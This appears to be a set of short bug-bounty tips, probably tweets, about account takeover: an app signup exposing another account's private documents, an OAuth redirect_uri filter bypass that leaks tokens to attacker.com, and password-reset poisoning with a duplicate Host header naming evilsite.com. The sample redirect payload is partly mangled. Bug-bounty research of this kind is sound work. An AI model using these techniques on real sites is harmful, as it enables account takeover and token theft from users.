Last updated 3 years ago
Account takeover worth $$$$ 1. Created account on website using test mail id 2. Upload private document like resume and photos 3. Same site having android app > Created account using same mail id but different password 4. Boom account created and able to see private documents
#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...
I was testing for ATO via reset function . Tried all method but no success. My friend@Tabnexa gave me tip to add double Host in request while requesting password Host: http://site.com Host: http://evilsite.com Boom it worked
